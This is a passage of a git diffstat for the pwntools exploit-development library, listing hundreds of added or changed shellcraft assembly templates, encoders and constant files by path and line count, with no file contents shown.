.../templates/mips/linux/truncate.asm | 14 + .../templates/mips/linux/truncate64.asm | 14 + .../templates/mips/linux/ulimit.asm | 14 + .../shellcraft/templates/mips/linux/umask.asm | 13 + .../shellcraft/templates/mips/linux/uname.asm | 13 + .../templates/mips/linux/unlink.asm | 13 + .../templates/mips/linux/unlinkat.asm | 15 + .../templates/mips/linux/unshare.asm | 13 + .../shellcraft/templates/mips/linux/ustat.asm | 14 + .../shellcraft/templates/mips/linux/utime.asm | 14 + .../templates/mips/linux/utimensat.asm | 16 + .../templates/mips/linux/utimes.asm | 14 + .../shellcraft/templates/mips/linux/vfork.asm | 13 + .../templates/mips/linux/vhangup.asm | 13 + .../templates/mips/linux/vmsplice.asm | 16 + .../shellcraft/templates/mips/linux/wait4.asm | 16 + .../templates/mips/linux/waitid.asm | 16 + .../templates/mips/linux/waitpid.asm | 15 + .../shellcraft/templates/mips/linux/write.asm | 15 + .../templates/mips/linux/writev.asm | 15 + pwnlib/shellcraft/templates/mips/mov.asm | 149 ++++-- pwnlib/shellcraft/templates/mips/nop.asm | 2 + pwnlib/shellcraft/templates/mips/push.asm | 27 ++ pwnlib/shellcraft/templates/mips/pushstr.asm | 111 +++++ pwnlib/shellcraft/templates/mips/setregs.asm | 45 ++ pwnlib/shellcraft/templates/mips/trap.asm | 2 + pwnlib/shellcraft/templates/powerpc/__doc__ | 0 .../templates/powerpc/linux/__doc__ | 0 .../templates/powerpc/linux/accept.asm | 15 + .../templates/powerpc/linux/access.asm | 14 + .../templates/powerpc/linux/acct.asm | 13 + .../templates/powerpc/linux/alarm.asm | 13 + .../templates/powerpc/linux/bind.asm | 15 + .../templates/powerpc/linux/brk.asm | 13 + .../templates/powerpc/linux/chdir.asm | 13 + .../templates/powerpc/linux/chmod.asm | 14 + .../templates/powerpc/linux/chown.asm | 15 + .../templates/powerpc/linux/chroot.asm | 13 + .../templates/powerpc/linux/clock_getres.asm | 14 + .../templates/powerpc/linux/clock_gettime.asm | 14 + .../powerpc/linux/clock_nanosleep.asm | 16 + .../templates/powerpc/linux/clock_settime.asm | 14 + .../templates/powerpc/linux/clone.asm | 17 + .../templates/powerpc/linux/close.asm | 13 + .../templates/powerpc/linux/connect.asm | 15 + .../templates/powerpc/linux/creat.asm | 14 + .../templates/powerpc/linux/dup.asm | 13 + .../templates/powerpc/linux/dup2.asm | 14 + .../templates/powerpc/linux/dup3.asm | 15 + .../templates/powerpc/linux/epoll_create.asm | 13 + .../templates/powerpc/linux/epoll_create1.asm | 13 + .../templates/powerpc/linux/epoll_ctl.asm | 16 + .../templates/powerpc/linux/epoll_pwait.asm | 17 + .../templates/powerpc/linux/epoll_wait.asm | 16 + .../templates/powerpc/linux/execve.asm | 15 + .../templates/powerpc/linux/exit.asm | 13 + .../templates/powerpc/linux/faccessat.asm | 16 + .../templates/powerpc/linux/fallocate.asm | 16 + .../templates/powerpc/linux/fchdir.asm | 13 + .../templates/powerpc/linux/fchmod.asm | 14 + .../templates/powerpc/linux/fchmodat.asm | 16 + .../templates/powerpc/linux/fchown.asm | 15 + .../templates/powerpc/linux/fchownat.asm | 17 + .../templates/powerpc/linux/fcntl.asm | 15 + .../templates/powerpc/linux/fdatasync.asm | 13 + .../templates/powerpc/linux/flock.asm | 14 + .../templates/powerpc/linux/fork.asm | 13 + .../templates/powerpc/linux/fstat.asm | 14 + .../templates/powerpc/linux/fstat64.asm | 14 + .../templates/powerpc/linux/fstatat64.asm | 16 + .../templates/powerpc/linux/fsync.asm | 13 + .../templates/powerpc/linux/ftruncate.asm | 14 + .../templates/powerpc/linux/ftruncate64.asm | 14 + .../templates/powerpc/linux/futimesat.asm | 15 + .../templates/powerpc/linux/getcwd.asm | 14 + .../templates/powerpc/linux/getegid.asm | 13 + .../templates/powerpc/linux/geteuid.asm | 13 + .../templates/powerpc/linux/getgid.asm | 13 + .../templates/powerpc/linux/getgroups.asm | 14 + .../templates/powerpc/linux/getitimer.asm | 14 + .../templates/powerpc/linux/getpeername.asm | 15 + .../templates/powerpc/linux/getpgid.asm | 13 + .../templates/powerpc/linux/getpgrp.asm | 13 + .../templates/powerpc/linux/getpid.asm | 13 + .../templates/powerpc/linux/getpmsg.asm | 17 + .../templates/powerpc/linux/getppid.asm | 13 + .../templates/powerpc/linux/getpriority.asm | 14 + .../templates/powerpc/linux/getresgid.asm | 15 + .../templates/powerpc/linux/getresuid.asm | 15 + .../templates/powerpc/linux/getrlimit.asm | 14 + .../templates/powerpc/linux/getrusage.asm | 14 + .../templates/powerpc/linux/getsid.asm | 13 + .../templates/powerpc/linux/getsockname.asm | 15 + .../templates/powerpc/linux/getsockopt.asm | 17 + .../templates/powerpc/linux/gettimeofday.asm | 14 + .../templates/powerpc/linux/getuid.asm | 13 + .../templates/powerpc/linux/gtty.asm | 14 + .../templates/powerpc/linux/ioctl.asm | 15 + .../templates/powerpc/linux/ioperm.asm | 15 + .../templates/powerpc/linux/iopl.asm | 13 + .../templates/powerpc/linux/kill.asm | 14 + .../templates/powerpc/linux/lchown.asm | 15 + .../templates/powerpc/linux/link.asm | 14 + .../templates/powerpc/linux/linkat.asm | 17 + .../templates/powerpc/linux/listen.asm | 14 + .../templates/powerpc/linux/lseek.asm | 15 + .../templates/powerpc/linux/lstat.asm | 14 + .../templates/powerpc/linux/lstat64.asm | 14 + .../templates/powerpc/linux/madvise.asm | 15 + .../templates/powerpc/linux/mincore.asm | 15 + .../templates/powerpc/linux/mkdir.asm | 14 + .../templates/powerpc/linux/mkdirat.asm | 15 + .../templates/powerpc/linux/mknod.asm | 15 + .../templates/powerpc/linux/mknodat.asm | 16 + .../templates/powerpc/linux/mlock.asm | 14 + .../templates/powerpc/linux/mlockall.asm | 13 + .../templates/powerpc/linux/mmap.asm | 18 + .../templates/powerpc/linux/mprotect.asm | 15 + .../templates/powerpc/linux/mq_notify.asm | 14 + .../templates/powerpc/linux/mq_open.asm | 15 + .../powerpc/linux/mq_timedreceive.asm | 17 + .../templates/powerpc/linux/mq_timedsend.asm | 17 + .../templates/powerpc/linux/mq_unlink.asm | 13 + .../templates/powerpc/linux/mremap.asm | 17 + .../templates/powerpc/linux/msync.asm | 15 + .../templates/powerpc/linux/munlock.asm | 14 + .../templates/powerpc/linux/munlockall.asm | 13 + .../templates/powerpc/linux/munmap.asm | 14 + .../templates/powerpc/linux/nanosleep.asm | 14 + .../templates/powerpc/linux/nice.asm | 13 + .../templates/powerpc/linux/open.asm | 15 + .../templates/powerpc/linux/openat.asm | 16 + .../templates/powerpc/linux/pause.asm | 13 + .../templates/powerpc/linux/pipe.asm | 13 + .../templates/powerpc/linux/pipe2.asm | 14 + .../templates/powerpc/linux/poll.asm | 15 + .../templates/powerpc/linux/ppoll.asm | 16 + .../templates/powerpc/linux/prctl.asm | 14 + .../templates/powerpc/linux/pread.asm | 16 + .../templates/powerpc/linux/preadv.asm | 16 + .../templates/powerpc/linux/prlimit64.asm | 16 + .../templates/powerpc/linux/profil.asm | 16 + .../templates/powerpc/linux/ptrace.asm | 14 + .../templates/powerpc/linux/putpmsg.asm | 17 + .../templates/powerpc/linux/pwrite.asm | 16 + .../templates/powerpc/linux/pwritev.asm | 16 + .../templates/powerpc/linux/read.asm | 15 + .../templates/powerpc/linux/readahead.asm | 15 + .../templates/powerpc/linux/readdir.asm | 13 + .../templates/powerpc/linux/readlink.asm | 15 + .../templates/powerpc/linux/readlinkat.asm | 16 + .../templates/powerpc/linux/readv.asm | 15 + .../templates/powerpc/linux/recv.asm | 16 + .../templates/powerpc/linux/recvfrom.asm | 18 + .../templates/powerpc/linux/recvmmsg.asm | 17 + .../templates/powerpc/linux/recvmsg.asm | 15 + .../powerpc/linux/remap_file_pages.asm | 17 + .../templates/powerpc/linux/rename.asm | 14 + .../templates/powerpc/linux/renameat.asm | 16 + .../templates/powerpc/linux/rmdir.asm | 13 + .../powerpc/linux/sched_get_priority_max.asm | 13 + .../powerpc/linux/sched_get_priority_min.asm | 13 + .../powerpc/linux/sched_getaffinity.asm | 15 + .../powerpc/linux/sched_getparam.asm | 14 + .../powerpc/linux/sched_getscheduler.asm | 13 + .../powerpc/linux/sched_rr_get_interval.asm | 14 + .../powerpc/linux/sched_setaffinity.asm | 15 + .../powerpc/linux/sched_setparam.asm | 14 + .../powerpc/linux/sched_setscheduler.asm | 15 + .../templates/powerpc/linux/sched_yield.asm | 13 + .../templates/powerpc/linux/select.asm | 17 + .../templates/powerpc/linux/sendfile.asm | 16 + .../templates/powerpc/linux/sendfile64.asm | 16 + .../templates/powerpc/linux/setdomainname.asm | 14 + .../templates/powerpc/linux/setgid.asm | 13 + .../templates/powerpc/linux/setgroups.asm | 14 + .../templates/powerpc/linux/sethostname.asm | 14 + .../templates/powerpc/linux/setitimer.asm | 15 + .../templates/powerpc/linux/setpgid.asm | 14 + .../templates/powerpc/linux/setpriority.asm | 15 + .../templates/powerpc/linux/setregid.asm | 14 + .../templates/powerpc/linux/setresgid.asm | 15 + .../templates/powerpc/linux/setresuid.asm | 15 + .../templates/powerpc/linux/setreuid.asm | 14 + .../templates/powerpc/linux/setrlimit.asm | 14 + .../templates/powerpc/linux/setsid.asm | 13 + .../templates/powerpc/linux/settimeofday.asm | 14 + .../templates/powerpc/linux/setuid.asm | 13 + .../templates/powerpc/linux/sigaction.asm | 15 + .../templates/powerpc/linux/sigaltstack.asm | 14 + .../templates/powerpc/linux/signal.asm | 14 + .../templates/powerpc/linux/sigpending.asm | 13 + .../templates/powerpc/linux/sigprocmask.asm | 15 + .../templates/powerpc/linux/sigreturn.asm | 10 + .../templates/powerpc/linux/sigsuspend.asm | 13 + .../templates/powerpc/linux/splice.asm | 18 + .../templates/powerpc/linux/stat.asm | 14 + .../templates/powerpc/linux/stat64.asm | 14 + .../templates/powerpc/linux/stime.asm | 13 + .../templates/powerpc/linux/stty.asm | 14 + .../templates/powerpc/linux/symlink.asm | 14 + .../templates/powerpc/linux/symlinkat.asm | 15 + .../templates/powerpc/linux/sync.asm | 13 + .../powerpc/linux/sync_file_range.asm | 16 + .../templates/powerpc/linux/syslog.asm | 15 + .../templates/powerpc/linux/tee.asm | 16 + .../templates/powerpc/linux/time.asm | 13 + .../templates/powerpc/linux/timer_create.asm | 15 + .../templates/powerpc/linux/timer_delete.asm | 13 + .../powerpc/linux/timer_getoverrun.asm | 13 + .../templates/powerpc/linux/timer_gettime.asm | 14 + .../templates/powerpc/linux/timer_settime.asm | 16 + .../templates/powerpc/linux/truncate.asm | 14 + .../templates/powerpc/linux/truncate64.asm | 14 + .../templates/powerpc/linux/ulimit.asm | 14 + .../templates/powerpc/linux/umask.asm | 13 + .../templates/powerpc/linux/uname.asm | 13 + .../templates/powerpc/linux/unlink.asm | 13 + .../templates/powerpc/linux/unlinkat.asm | 15 + .../templates/powerpc/linux/unshare.asm | 13 + .../templates/powerpc/linux/ustat.asm | 14 + .../templates/powerpc/linux/utime.asm | 14 + .../templates/powerpc/linux/utimensat.asm | 16 + .../templates/powerpc/linux/utimes.asm | 14 + .../templates/powerpc/linux/vfork.asm | 13 + .../templates/powerpc/linux/vhangup.asm | 13 + .../templates/powerpc/linux/vmsplice.asm | 16 + .../templates/powerpc/linux/wait4.asm | 16 + .../templates/powerpc/linux/waitid.asm | 16 + .../templates/powerpc/linux/waitpid.asm | 15 + .../templates/powerpc/linux/write.asm | 15 + .../templates/powerpc/linux/writev.asm | 15 + pwnlib/shellcraft/templates/thumb/crash.asm | 12 + pwnlib/shellcraft/templates/thumb/itoa.asm | 75 +++ .../templates/thumb/linux/accept.asm | 15 + .../templates/thumb/linux/access.asm | 14 + .../shellcraft/templates/thumb/linux/acct.asm | 13 + .../templates/thumb/linux/alarm.asm | 13 + .../shellcraft/templates/thumb/linux/bind.asm | 15 + .../shellcraft/templates/thumb/linux/brk.asm | 13 + .../shellcraft/templates/thumb/linux/cat.asm | 25 + .../templates/thumb/linux/chdir.asm | 13 + .../templates/thumb/linux/chmod.asm | 14 + .../templates/thumb/linux/chown.asm | 15 + .../templates/thumb/linux/chroot.asm | 13 + .../templates/thumb/linux/clock_getres.asm | 14 + .../templates/thumb/linux/clock_gettime.asm | 14 + .../templates/thumb/linux/clock_nanosleep.asm | 16 + .../templates/thumb/linux/clock_settime.asm | 14 + .../templates/thumb/linux/clone.asm | 17 + .../templates/thumb/linux/close.asm | 13 + .../templates/thumb/linux/connect.asm | 32 +- .../templates/thumb/linux/creat.asm | 14 + .../shellcraft/templates/thumb/linux/dup2.asm | 14 + .../shellcraft/templates/thumb/linux/dup3.asm | 15 + .../shellcraft/templates/thumb/linux/echo.asm | 14 + .../templates/thumb/linux/epoll_create.asm | 13 + .../templates/thumb/linux/epoll_create1.asm | 13 + .../templates/thumb/linux/epoll_ctl.asm | 16 + .../templates/thumb/linux/epoll_pwait.asm | 17 + .../templates/thumb/linux/epoll_wait.asm | 16 + .../templates/thumb/linux/execve.asm | 26 + .../shellcraft/templates/thumb/linux/exit.asm | 13 + .../templates/thumb/linux/faccessat.asm | 16 + .../templates/thumb/linux/fallocate.asm | 16 + .../templates/thumb/linux/fchdir.asm | 13 + .../templates/thumb/linux/fchmod.asm | 14 + .../templates/thumb/linux/fchmodat.asm | 16 + .../templates/thumb/linux/fchown.asm | 15 + .../templates/thumb/linux/fchownat.asm | 17 + .../templates/thumb/linux/fcntl.asm | 15 + .../templates/thumb/linux/fdatasync.asm | 13 + .../templates/thumb/linux/flock.asm | 14 + .../shellcraft/templates/thumb/linux/fork.asm | 13 + .../templates/thumb/linux/forkbomb.asm | 13 + .../templates/thumb/linux/forkexit.asm | 16 + .../templates/thumb/linux/fstat.asm | 14 + .../templates/thumb/linux/fstat64.asm | 14 + .../templates/thumb/linux/fstatat64.asm | 16 + .../templates/thumb/linux/fsync.asm | 13 + .../templates/thumb/linux/ftruncate.asm | 14 + .../templates/thumb/linux/ftruncate64.asm | 14 + .../templates/thumb/linux/futimesat.asm | 15 + .../templates/thumb/linux/getcwd.asm | 14 + .../templates/thumb/linux/getegid.asm | 13 + .../templates/thumb/linux/geteuid.asm | 13 + .../templates/thumb/linux/getgid.asm | 13 + .../templates/thumb/linux/getgroups.asm | 14 + .../templates/thumb/linux/getitimer.asm | 14 + .../templates/thumb/linux/getpeername.asm | 15 + .../templates/thumb/linux/getpgid.asm | 13 + .../templates/thumb/linux/getpgrp.asm | 13 + .../templates/thumb/linux/getpid.asm | 13 + .../templates/thumb/linux/getpmsg.asm | 17 + .../templates/thumb/linux/getppid.asm | 13 + .../templates/thumb/linux/getpriority.asm | 14 + .../templates/thumb/linux/getresgid.asm | 15 + .../templates/thumb/linux/getresuid.asm | 15 + .../templates/thumb/linux/getrlimit.asm | 14 + .../templates/thumb/linux/getrusage.asm | 14 + .../templates/thumb/linux/getsid.asm | 13 + .../templates/thumb/linux/getsockname.asm | 15 + .../templates/thumb/linux/getsockopt.asm | 17 + .../templates/thumb/linux/gettimeofday.asm | 14 + .../templates/thumb/linux/getuid.asm | 13 + .../shellcraft/templates/thumb/linux/gtty.asm | 14 + .../templates/thumb/linux/ioctl.asm | 15 + .../templates/thumb/linux/ioperm.asm | 15 + .../shellcraft/templates/thumb/linux/iopl.asm | 13 + .../shellcraft/templates/thumb/linux/kill.asm | 14 + .../templates/thumb/linux/killparent.asm | 17 + .../templates/thumb/linux/lchown.asm | 15 + .../shellcraft/templates/thumb/linux/link.asm | 14 + .../templates/thumb/linux/linkat.asm | 17 + .../templates/thumb/linux/loader.asm | 173 +++++++ .../templates/thumb/linux/loader_append.asm | 52 ++ .../templates/thumb/linux/lseek.asm | 15 + .../templates/thumb/linux/lstat.asm | 14 + .../templates/thumb/linux/lstat64.asm | 14 + .../templates/thumb/linux/madvise.asm | 15 + .../templates/thumb/linux/mincore.asm | 15 + .../templates/thumb/linux/mkdir.asm | 14 + .../templates/thumb/linux/mkdirat.asm | 15 + .../templates/thumb/linux/mknod.asm | 15 + .../templates/thumb/linux/mknodat.asm | 16 + .../templates/thumb/linux/mlock.asm | 14 + .../templates/thumb/linux/mlockall.asm | 13 + .../shellcraft/templates/thumb/linux/mmap.asm | 18 + .../shellcraft/templates/thumb/linux/mov.asm | 21 +- .../templates/thumb/linux/mprotect.asm | 15 + .../templates/thumb/linux/mq_notify.asm | 14 + .../templates/thumb/linux/mq_open.asm | 15 + .../templates/thumb/linux/mq_timedreceive.asm | 17 + .../templates/thumb/linux/mq_timedsend.asm | 17 + .../templates/thumb/linux/mq_unlink.asm | 13 + .../templates/thumb/linux/mremap.asm | 17 + .../templates/thumb/linux/msync.asm | 15 + .../templates/thumb/linux/munlock.asm | 14 + .../templates/thumb/linux/munlockall.asm | 13 + .../templates/thumb/linux/munmap.asm | 14 + .../templates/thumb/linux/nanosleep.asm | 14 + .../shellcraft/templates/thumb/linux/nice.asm | 13 + .../shellcraft/templates/thumb/linux/open.asm | 15 + .../templates/thumb/linux/openat.asm | 16 + .../templates/thumb/linux/pause.asm | 13 + .../shellcraft/templates/thumb/linux/pipe.asm | 13 + .../templates/thumb/linux/pipe2.asm | 14 + .../shellcraft/templates/thumb/linux/poll.asm | 15 + .../templates/thumb/linux/ppoll.asm | 16 + .../templates/thumb/linux/prctl.asm | 14 + .../templates/thumb/linux/pread.asm | 16 + .../templates/thumb/linux/preadv.asm | 16 + .../templates/thumb/linux/prlimit64.asm | 16 + .../templates/thumb/linux/profil.asm | 16 + .../templates/thumb/linux/ptrace.asm | 14 + .../shellcraft/templates/thumb/linux/push.asm | 23 +- .../templates/thumb/linux/putpmsg.asm | 17 + .../templates/thumb/linux/pwrite.asm | 16 + .../templates/thumb/linux/pwritev.asm | 16 + .../shellcraft/templates/thumb/linux/read.asm | 15 + .../templates/thumb/linux/readahead.asm | 15 + .../templates/thumb/linux/readdir.asm | 13 + .../templates/thumb/linux/readlink.asm | 15 + .../templates/thumb/linux/readlinkat.asm | 16 + .../templates/thumb/linux/readn.asm | 23 + .../templates/thumb/linux/readv.asm | 15 + .../shellcraft/templates/thumb/linux/recv.asm | 16 + .../templates/thumb/linux/recvfrom.asm | 18 + .../templates/thumb/linux/recvmmsg.asm | 17 + .../templates/thumb/linux/recvmsg.asm | 15 + .../thumb/linux/remap_file_pages.asm | 17 + .../templates/thumb/linux/rename.asm | 14 + .../templates/thumb/linux/renameat.asm | 16 + .../templates/thumb/linux/rmdir.asm | 13 + .../thumb/linux/sched_get_priority_max.asm | 13 + .../thumb/linux/sched_get_priority_min.asm | 13 + .../thumb/linux/sched_getaffinity.asm | 15 + .../templates/thumb/linux/sched_getparam.asm | 14 + .../thumb/linux/sched_getscheduler.asm | 13 + .../thumb/linux/sched_rr_get_interval.asm | 14 + .../thumb/linux/sched_setaffinity.asm | 15 + .../templates/thumb/linux/sched_setparam.asm | 14 + .../thumb/linux/sched_setscheduler.asm | 15 + .../templates/thumb/linux/sched_yield.asm | 13 + .../templates/thumb/linux/select.asm | 17 + .../templates/thumb/linux/sendfile.asm | 16 + .../templates/thumb/linux/sendfile64.asm | 16 + .../templates/thumb/linux/setdomainname.asm | 14 + .../templates/thumb/linux/setgid.asm | 13 + .../templates/thumb/linux/setgroups.asm | 14 + .../templates/thumb/linux/sethostname.asm | 14 + .../templates/thumb/linux/setitimer.asm | 15 + .../templates/thumb/linux/setpgid.asm | 14 + .../templates/thumb/linux/setpriority.asm | 15 + .../templates/thumb/linux/setregid.asm | 14 + .../templates/thumb/linux/setresgid.asm | 15 + .../templates/thumb/linux/setresuid.asm | 15 + .../templates/thumb/linux/setreuid.asm | 14 + .../templates/thumb/linux/setrlimit.asm | 14 + .../templates/thumb/linux/setsid.asm | 13 + .../templates/thumb/linux/settimeofday.asm | 14 + .../templates/thumb/linux/setuid.asm | 13 + .../shellcraft/templates/thumb/linux/sh.asm | 21 +- .../templates/thumb/linux/sigaction.asm | 15 + .../templates/thumb/linux/sigaltstack.asm | 14 + .../templates/thumb/linux/signal.asm | 14 + .../templates/thumb/linux/sigpending.asm | 13 + .../templates/thumb/linux/sigprocmask.asm | 15 + .../templates/thumb/linux/sigreturn.asm | 10 + .../templates/thumb/linux/sigsuspend.asm | 13 + .../templates/thumb/linux/splice.asm | 18 + .../templates/thumb/linux/stage.asm | 62 +++ .../shellcraft/templates/thumb/linux/stat.asm | 14 + .../templates/thumb/linux/stat64.asm | 14 + .../templates/thumb/linux/stime.asm | 13 + .../shellcraft/templates/thumb/linux/stty.asm | 14 + .../templates/thumb/linux/symlink.asm | 14 + .../templates/thumb/linux/symlinkat.asm | 15 + .../shellcraft/templates/thumb/linux/sync.asm | 13 + .../templates/thumb/linux/sync_file_range.asm | 16 + .../templates/thumb/linux/syscall.asm | 27 +- .../templates/thumb/linux/syslog.asm | 15 + .../shellcraft/templates/thumb/linux/tee.asm | 16 + .../shellcraft/templates/thumb/linux/time.asm | 13 + .../templates/thumb/linux/timer_create.asm | 15 + .../templates/thumb/linux/timer_delete.asm | 13 + .../thumb/linux/timer_getoverrun.asm | 13 + .../templates/thumb/linux/timer_gettime.asm | 14 + .../templates/thumb/linux/timer_settime.asm | 16 + .../templates/thumb/linux/truncate.asm | 14 + .../templates/thumb/linux/truncate64.asm | 14 + .../templates/thumb/linux/ulimit.asm | 14 + .../templates/thumb/linux/umask.asm | 13 + .../templates/thumb/linux/uname.asm | 13 + .../templates/thumb/linux/unlink.asm | 13 + .../templates/thumb/linux/unlinkat.asm | 15 + .../templates/thumb/linux/unshare.asm | 13 + .../templates/thumb/linux/ustat.asm | 14 + .../templates/thumb/linux/utime.asm | 14 + .../templates/thumb/linux/utimensat.asm | 16 + .../templates/thumb/linux/utimes.asm | 14 + .../templates/thumb/linux/vfork.asm | 13 + .../templates/thumb/linux/vhangup.asm | 13 + .../templates/thumb/linux/vmsplice.asm | 16 + .../templates/thumb/linux/wait4.asm | 16 + .../templates/thumb/linux/waitid.asm | 16 + .../templates/thumb/linux/waitpid.asm | 15 + .../templates/thumb/linux/write.asm | 15 + .../templates/thumb/linux/writev.asm | 15 + pwnlib/shellcraft/templates/thumb/memcpy.asm | 19 + pwnlib/shellcraft/templates/thumb/mov.asm | 148 ++++-- pwnlib/shellcraft/templates/thumb/popad.asm | 6 + pwnlib/shellcraft/templates/thumb/push.asm | 46 +- pwnlib/shellcraft/templates/thumb/pushad.asm | 6 + pwnlib/shellcraft/templates/thumb/pushstr.asm | 40 +- pwnlib/shellcraft/templates/thumb/setregs.asm | 43 ++ pwnlib/shellcraft/templates/thumb/to_arm.asm | 23 + pwnlib/shellcraft/templates/thumb/trap.asm | 2 + pwnlib/shellcraft/templates/thumb/udiv_10.asm | 18 + pwnlib/tubes/process.py | 10 +- pwnlib/tubes/tube.py | 4 +- pwnlib/util/fiddling.py | 57 ++- pwnlib/util/getdents.py | 57 +++ 1656 files changed, 27374 insertions(+), 858 deletions(-) create mode 100644 pwnlib/args.py create mode 100644 pwnlib/commandline/pwnstrip.py create mode 100644 pwnlib/commandline/scramble.py create mode 100644 pwnlib/constants/cgc/__init__.py create mode 120000 pwnlib/constants/cgc/aarch64.py create mode 120000 pwnlib/constants/cgc/alpha.py create mode 120000 pwnlib/constants/cgc/amd64.py create mode 120000 pwnlib/constants/cgc/arm.py create mode 120000 pwnlib/constants/cgc/i386.py create mode 120000 pwnlib/constants/cgc/ia64.py create mode 120000 pwnlib/constants/cgc/mips.py create mode 120000 pwnlib/constants/cgc/powerpc.py create mode 120000 pwnlib/constants/cgc/powerpc64.py create mode 120000 pwnlib/constants/cgc/s390.py create mode 120000 pwnlib/constants/cgc/s390x.py create mode 120000 pwnlib/constants/cgc/sparc.py create mode 120000 pwnlib/constants/cgc/sparc64.py create mode 100644 pwnlib/constants/cgc/thumb.py create mode 120000 pwnlib/data/includes/cgc/aarch64.h create mode 120000 pwnlib/data/includes/cgc/alpha.h create mode 120000 pwnlib/data/includes/cgc/amd64.h create mode 100644 pwnlib/data/includes/cgc/arm.h create mode 120000 pwnlib/data/includes/cgc/i386.h create mode 120000 pwnlib/data/includes/cgc/ia64.h create mode 120000 pwnlib/data/includes/cgc/mips.h create mode 120000 pwnlib/data/includes/cgc/powerpc.h create mode 120000 pwnlib/data/includes/cgc/powerpc64.h create mode 120000 pwnlib/data/includes/cgc/s390.h create mode 120000 pwnlib/data/includes/cgc/s390x.h create mode 120000 pwnlib/data/includes/cgc/sparc.h create mode 120000 pwnlib/data/includes/cgc/sparc64.h create mode 120000 pwnlib/data/includes/cgc/thumb.h create mode 100644 pwnlib/encoders/amd64/delta.py create mode 100755 pwnlib/encoders/arm/alphanumeric/ARM_Instructions.py create mode 100644 pwnlib/encoders/arm/alphanumeric/__init__.py create mode 100755 pwnlib/encoders/arm/alphanumeric/alphanum_byte.py create mode 100644 pwnlib/encoders/arm/alphanumeric/alphanumeric.py create mode 100755 pwnlib/encoders/arm/alphanumeric/builder.py create mode 100755 pwnlib/encoders/arm/alphanumeric/random_funcs.py create mode 100644 pwnlib/encoders/arm/xor.py create mode 100644 pwnlib/encoders/i386/delta.py create mode 100644 pwnlib/encoders/mips/__init__.py create mode 100644 pwnlib/encoders/mips/xor.py create mode 100644 pwnlib/shellcraft/templates/aarch64/__doc__ create mode 100644 pwnlib/shellcraft/templates/aarch64/infloop.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/__doc__ create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/accept.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/access.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/acct.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/alarm.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/bind.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/brk.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/cat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/chdir.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/chmod.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/chown.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/chroot.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/clock_getres.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/clock_gettime.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/clock_nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/clock_settime.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/clone.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/close.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/connect.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/creat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/dup.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/dup2.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/dup3.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/echo.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/epoll_create.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/epoll_create1.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/epoll_ctl.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/epoll_pwait.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/epoll_wait.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/execve.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/exit.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/faccessat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fallocate.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fchdir.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fchmod.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fchmodat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fchown.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fchownat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fcntl.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fdatasync.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/flock.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fork.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/forkexit.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fstat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fstat64.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fstatat64.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fsync.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/ftruncate.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/ftruncate64.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/futimesat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getcwd.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getegid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/geteuid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getgid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getgroups.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getitimer.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getpeername.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getpgid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getpgrp.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getpid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getpmsg.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getppid.asm create mode 100644 